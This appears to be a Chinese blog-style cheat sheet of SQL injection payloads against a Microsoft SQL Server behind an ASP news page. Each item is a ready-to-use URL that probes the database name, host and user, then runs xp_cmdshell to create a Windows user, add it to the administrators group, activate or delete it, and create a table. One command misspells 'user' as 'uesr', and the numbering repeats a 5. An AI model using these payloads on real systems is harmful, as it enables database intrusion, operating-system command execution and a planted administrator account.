mssql Server:
1. 猜数据库的名字
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7 and db_name()>0
2. 猜主机名
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7 and host_name()>0
3. 猜当前用户
若为dbo则为sa
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7 and user>0
4.新添加一个用户: aaa 密码 bbb
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7; exec master..xp_cmdshell "net user aaa bbb /add"
5.删除一个用户
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7; exec master..xp_cmdshell "net user aaa /del"
5.将用户aaa 添加到 administrator 用户组下
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7; exec master..xp_cmdshell "net localgroup administrators aaa /add"
6.将用户aaa激活
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7;exec master..xp_cmdshell "net uesr aaa /active:yes"
7.创建temp表
http://192.168.1.3/index_SiteNews_Content.asp?fID_SiteNewsContent=7; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));
mssql server sql 注入整理(1)
最新推荐文章于 2024-09-27 11:31:35 发布